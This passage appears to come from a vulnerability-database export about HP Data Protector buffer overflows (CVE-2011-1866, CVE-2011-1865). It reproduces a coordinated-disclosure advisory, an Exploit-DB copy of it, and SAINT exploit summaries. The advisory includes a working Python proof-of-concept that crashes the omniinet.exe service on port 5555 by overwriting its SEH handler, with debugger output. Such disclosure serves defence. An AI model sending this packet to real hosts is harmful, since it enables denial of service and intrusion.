127.0.0.1 20 1 7 6\"\n The process terminates without generating an exception, resulting in a\ndenial of service condition.\n\n\n9. *Report Timeline*\n\n. 2011-06-02:\nCore Security Technologies notifies HP Security Alert team of the\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\n\n. 2011-06-06:\nVendor acknowledges receipt.\n\n. 2011-06-06:\nCore sends technical details to the vendor.\n\n. 2011-06-06:\nVendor confirms that a new case was assigned within HP Software Security\nResponse Team (SSRT).\n\n. 2011-06-16:\nCore requests an update on this issue, in particular Core asks the\nvendor for a technical analysis of the bugs, a list of affected products\nand versions, and the vendor's plan for providing a fix (no reply\nreceived).\n\n. 2011-06-23:\nCore requests once more an update.\n\n. 2011-06-28:\nVendor communicates that a security bulletin will be issued on the same\nday (June 28). The vendor confirms the vulnerabilities, and recommends\nas mitigation to enable encrypted communications in the cell server and\nclient.\n\n. 2011-06-28:\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\nhave been assigned.\n\n. 2011-06-28:\nVendor provides a link to the bulletin and CVE names for the\nvulnerabilities.\n\n. 2011-06-29:\nAdvisory CORE-2011-0514 is published.\n\n\n10. *References*\n\n[1] HP Data Protector http://hp.com/go/dataprotector\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\nRemote Execution of Arbitrary Code\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2011 Core Security\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\n\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\n=ozGY\n-----END PGP SIGNATURE-----", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:18", "description": "\nHP Data Protector 6.20 - EXEC_CMD Buffer Overflow", "edition": 1, "published": "2011-06-30T00:00:00", "title": "HP Data Protector 6.20 - EXEC_CMD Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2011-06-30T00:00:00", "id": "EXPLOITPACK:00DB1608EA05836AAFE73947E6790FBA", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - Corelabs Advisory\n http://corelabs.coresecurity.com/\n\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\n\n\n1. *Advisory Information*\n\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\nAdvisory ID: CORE-2011-0606\nAdvisory URL:\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\nDate published: 2011-06-29\nDate of last update: 2011-06-29\nVendors contacted: HP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Remote stack overflow [CWE-120]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1866\n\n\n3. *Vulnerability Description*\n\nHP Data Protector [1] is an automated backup and recovery software for\nsingle-server to enterprise environments. A vulnerability in HP Data\nProtector could allow a remote attacker to execute arbitrary code. The\nvulnerability is triggered by sending a request to port 5555 of a host\nrunning the \"data protector inet\" service, part of HP Data Protector.\n\n\n4. *Vulnerable packages*\n\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\n . Previous versions may be affected, but were not tested.\n\n\n5. *Non-vulnerable packages*\n\n . No fixes are available at the time of publication.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nHP has issued a security bulletin with document ID c02872182 [2]\navailable through HP Support Center at http://www.hp.com/go/HPSC.\n\nThe latest version of HP Data Protector is vulnerable to this issue. HP\nhas provided the following procedure to mitigate this vulnerability:\n\n 1. Upgrade to Data Protector A.06.20 or subsequent.\n 2. Enable encrypted control communication services on cell server and\nall clients in cell.\n\n The upgrade is available for download from\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\n'Trials and Demos'.\n\n\n7. *Credits*\n\nThis vulnerability was discovered and researched by Nahuel C. Riva from\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script can be used to reproduce the bug.\n\n/-----\nimport sys\nimport socket\n\nfrom struct import pack\n\nip = sys.argv[1]\nport = int(sys.argv[2]) # default tcp port 5555\n\ntarget = (ip, port)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(target)\n\npath = 'A' * 5000\n\npacket = pack('<L', 0x20003220)\npacket += pack('<L', 0x00302000)\npacket += '\\x20'\npacket += pack('>H', 0x0020)\npacket += pack('<L', 0x00432000)\npacket += pack('<L', 0x00303220)\npacket += '\\x20'\npacket += 'omnicheck.exe'\npacket += pack('>H', 0x0020)\npacket += pack('>H', 0x0020) * 4\npacket += pack('<L', 0x30200030)\npacket += pack('>H', 0x0020)\npacket += path\npacket += pack('>H', 0x0000)\n\nplen = pack('>L', len(packet))\n\ns.send(plen + packet)\n\n- -----/\n By executing this script, the omniinet.exe process crashes in the\nfollowing EIP:\n\n/-----\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\n7C8285D6 8BE5 MOV ESP,EBP\n7C8285D8 5D POP EBP\n7C8285D9 C3 RETN\n \n- -----/\n This is part of a function inside the ntdll.dll library, however, if we\nlook the SEH chain, we can see that the SEH handler was overwritten with\nthe value 0x00410041 (the unicode value for \"AA\"):\n\n/-----\nSEH chain of thread 00000578\nAddress SE handler\n009AFF94 omniinet.00410041\n00410041 A3004472\n \n- -----/\n The following are the values of the CPU registers at the time of the\ncrash:\n\n/-----\nEAX C0000008\nECX 009AEC98\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\nEBX 0015B480\nESP 009AEC44\nEBP 009AEC94\nESI 00155A80\nEDI 00000000\nEIP 7C8285D3 ntdll.7C8285D3\nC 0 ES 0023 32bit 0(FFFFFFFF)\nP 1 CS 001B 32bit 0(FFFFFFFF)\nA 0 SS 0023 32bit 0(FFFFFFFF)\nZ 0 DS 0023 32bit 0(FFFFFFFF)\nS 0 FS 003B 32bit 7FFDB000(FFF)\nT 0 GS 0000 NULL\nD 0\nO 0 LastErr ERROR_SUCCESS (00000000)\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\nST0 empty 0.0\nST1 empty 0.0\nST2 empty 0.0\nST3 empty 0.0\nST4 empty 0.0\nST5 empty 0.0\nST6 empty 0.7610000000000000098\nST7 empty 1.0000000000000000000\n 3 2 1 0 E S P U O Z D I\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\n \n- -----/\n The problem is in the 0041D170 function. This function does a blind\ncopy of the string passed in the packet as a path:\n\n/-----\n0041D170 /$ 55 PUSH EBP\n0041D171 |. 8BEC MOV EBP,ESP\n0041D173 |. 51 PUSH ECX\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\n0041D180 |. 85D2 TEST EDX,EDX\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\n[...]\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\n0041D1FD |. 85C9 |TEST ECX,ECX\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\nto the stack\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\n0041D216 |. 83C0 02 |ADD EAX,2\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\n0041D21F |. 83C1 02 |ADD ECX,2\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\n0041D232 |. 8BE5 MOV ESP,EBP\n0041D234 |. 5D POP EBP\n0041D235 \\. C3 RETN\n \n- -----/\n\n\n\n9. *Report Timeline*\n\n. 2011-06-06:\nCore Security Technologies notifies the HP team of the vulnerabilities\nand provides the technical details. Publication date is temporarily set\nto July 5th, 2011.\n\n. 2011-06-06:\nVendor confirms that a new case was assigned within HP Software Security\nResponse Team (SSRT).\n\n. 2011-06-16:\nCore requests an update on this issue, in particular Core asks the\nvendor for a technical analysis of the bugs, a list of affected products\nand versions, and the vendor's plan for providing a fix (no reply\nreceived).\n\n. 2011-06-23:\nCore requests once more an update.\n\n. 2011-06-28:\nVendor communicates that a security bulletin will be issued on the same\nday (June 28). The vendor confirms the vulnerabilities, and recommends\nas mitigation to enable encrypted communications in the cell server and\nclient.\n\n. 2011-06-28:\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\nhave been assigned.\n\n. 2011-06-28:\nVendor provides a link to the bulletin and CVE names for the\nvulnerabilities.\n\n. 2011-06-29:\nAdvisory CORE-2011-0606 is published.\n\n\n\n10. *References*\n\n[1] HP Data Protector http://hp.com/go/dataprotector\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\nRemote Execution of Arbitrary Code\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2011 Core Security\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\n\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\n=zHon\n-----END PGP SIGNATURE-----", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "description": "Added: 06/27/2012 \nCVE: [CVE-2011-1866](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866>) \nBID: [48488](<http://www.securityfocus.com/bid/48488>) \nOSVDB: [73572](<http://www.osvdb.org/73572>) \n\n\n### Background\n\n[HP Data Protector](<http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html>) is an automated data backup solution. \n\n### Problem\n\nA buffer overflow vulnerability in `omniinet.exe` in the inet service of HP OpenView Storage Data Protector allows remote attackers to execute arbitrary commands by sending a specially crafted request to the inet service on port 5555/tcp. \n\n### Resolution\n\nApply the update referenced in [HPSBMU02686](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Storage Data Protector 6.11 on Microsoft Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:BFECBBFEF0FF935EC2948195CF6FCA20", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_inet_svc_exec_cmd", "type": "saint", "title": "HP OpenView Storage Data Protector inet Service EXEC_CMD Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "description": "Added: 06/27/2012 \nCVE: [CVE-2011-1866](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866>) \nBID: [48488](<http://www.securityfocus.com/bid/48488>) \nOSVDB: [73572](<http://www.osvdb.org/73572>) \n\n\n### Background\n\n[HP Data Protector](<http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html>) is an automated data backup solution. \n\n### Problem\n\nA buffer overflow vulnerability in `omniinet.exe` in the inet service of HP OpenView Storage Data Protector allows remote attackers to execute arbitrary commands by sending a specially crafted request to the inet service on port 5555/tcp. \n\n### Resolution\n\nApply the update referenced in [HPSBMU02686](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Storage Data Protector 6.11 on Microsoft Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:06C6A95370F0B8116A7243D809437C0C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_inet_svc_exec_cmd", "title": "HP OpenView Storage Data Protector inet Service EXEC_CMD Remote Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "edition": 2, "description": "Added: 06/27/2012 \nCVE: [CVE-2011-1866](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866>) \nBID: [48488](<http://www.securityfocus.com/bid/48488>) \nOSVDB: [73572](<http://www.osvdb.org/73572>) \n\n\n### Background\n\n[HP Data Protector](<http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html>) is an automated data backup solution. \n\n### Problem\n\nA buffer overflow vulnerability in `omniinet.exe` in the inet service of HP OpenView Storage Data Protector allows remote attackers to execute arbitrary commands by sending a specially crafted request to the inet service on port 5555/tcp. \n\n### Resolution\n\nApply the update referenced in [HPSBMU02686](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Storage Data Protector 6.11 on Microsoft Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:1A7CE71BAD720EA2DC8BE64DC4A90616", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_inet_svc_exec_cmd", "type": "saint", "title": "HP OpenView Storage Data Protector inet Service EXEC_CMD Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 1, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "type": "saint", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 4, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "edition": 2, "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. \n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "id": "SAINT:58795E132074156A75A962B77A5E7B84", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:54:41", "description": "HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability. CVE-2011-1866. Dos exploit for windows platform", "published": "2011-06-30T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2011-06-30T00:00:00", "id": "EDB-ID:17461", "href": "https://www.exploit-db.com/exploits/17461/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\nAdvisory ID: CORE-2011-0606\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1866\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. A vulnerability in HP Data\r\nProtector could allow a remote attacker to execute arbitrary code. The\r\nvulnerability is triggered by sending a request to port 5555 of a host\r\nrunning the \"data protector inet\" service, part of HP Data Protector.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to this issue. HP\r\nhas provided the following procedure to mitigate this vulnerability:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Nahuel C. Riva from\r\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the bug.\r\n\r\n/-----\r\nimport sys\r\nimport socket\r\n\r\nfrom struct import pack\r\n\r\nip = sys.argv[1]\r\nport = int(sys.argv[2]) # default tcp port 5555\r\n\r\ntarget = (ip, port)\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(target)\r\n\r\npath = 'A' * 5000\r\n\r\npacket = pack('<L', 0x20003220)\r\npacket += pack('<L', 0x00302000)\r\npacket += '\\x20'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('<L', 0x00432000)\r\npacket += pack('<L', 0x00303220)\r\npacket += '\\x20'\r\npacket += 'omnicheck.exe'\r\npacket += pack('>H', 0x0020)\r\npacket += pack('>H', 0x0020) * 4\r\npacket += pack('<L', 0x30200030)\r\npacket += pack('>H', 0x0020)\r\npacket += path\r\npacket += pack('>H', 0x0000)\r\n\r\nplen = pack('>L', len(packet))\r\n\r\ns.send(plen + packet)\r\n\r\n- -----/\r\n By executing this script, the omniinet.exe process crashes in the\r\nfollowing EIP:\r\n\r\n/-----\r\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\r\n7C8285D6 8BE5 MOV ESP,EBP\r\n7C8285D8 5D POP EBP\r\n7C8285D9 C3 RETN\r\n \r\n- -----/\r\n This is part of a function inside the ntdll.dll library, however, if we\r\nlook the SEH chain, we can see that the SEH handler was overwritten with\r\nthe value 0x00410041 (the unicode value for \"AA\"):\r\n\r\n/-----\r\nSEH chain of thread 00000578\r\nAddress SE handler\r\n009AFF94 omniinet.00410041\r\n00410041 A3004472\r\n \r\n- -----/\r\n The following are the values of the CPU registers at the time of the\r\ncrash:\r\n\r\n/-----\r\nEAX C0000008\r\nECX 009AEC98\r\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\r\nEBX 0015B480\r\nESP 009AEC44\r\nEBP 009AEC94\r\nESI 00155A80\r\nEDI 00000000\r\nEIP 7C8285D3 ntdll.7C8285D3\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 0 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDB000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty 0.0\r\nST1 empty 0.0\r\nST2 empty 0.0\r\nST3 empty 0.0\r\nST4 empty 0.0\r\nST5 empty 0.0\r\nST6 empty 0.7610000000000000098\r\nST7 empty 1.0000000000000000000\r\n 3 2 1 0 E S P U O Z D I\r\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n \r\n- -----/\r\n The problem is in the 0041D170 function. This function does a blind\r\ncopy of the string passed in the packet as a path:\r\n\r\n/-----\r\n0041D170 /$ 55 PUSH EBP\r\n0041D171 |. 8BEC MOV EBP,ESP\r\n0041D173 |. 51 PUSH ECX\r\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\r\n0041D180 |. 